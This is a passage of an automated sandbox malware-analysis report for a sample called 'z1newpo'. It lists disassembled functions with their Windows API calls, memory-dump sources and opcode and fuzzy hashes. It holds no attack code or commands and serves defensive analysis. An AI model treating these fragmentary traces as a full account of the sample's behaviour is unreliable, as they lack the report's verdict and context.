                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                    • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                    Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                    • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                    • String ID:
                                                    • API String ID: 960795272-0
                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                    Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 4189319755-0
                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                    Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                    • String ID:
                                                    • API String ID: 1976402638-0
                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                    Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                    Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorLast
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 2487901850-572801152
                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                    Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageSend
                                                    • String ID:
                                                    • API String ID: 1871949834-0
                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                    Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                    Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                    • SendMessageW.USER32 ref: 00471AE3
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 3611059338-0
                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                    Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                    • String ID:
                                                    • API String ID: 1640429340-0
                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                    Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcslen.LIBCMT ref: 004438CD
                                                    • _wcslen.LIBCMT ref: 004438E6
                                                    • _wcstok.LIBCMT ref: 004438F8
                                                    • _wcslen.LIBCMT ref: 0044390C
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                    • _wcstok.LIBCMT ref: 00443931
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                    • String ID:
                                                    • API String ID: 3632110297-0
                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                    Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 752480666-0
                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                    Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                    Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                    Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                    Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32 ref: 004555C7
                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
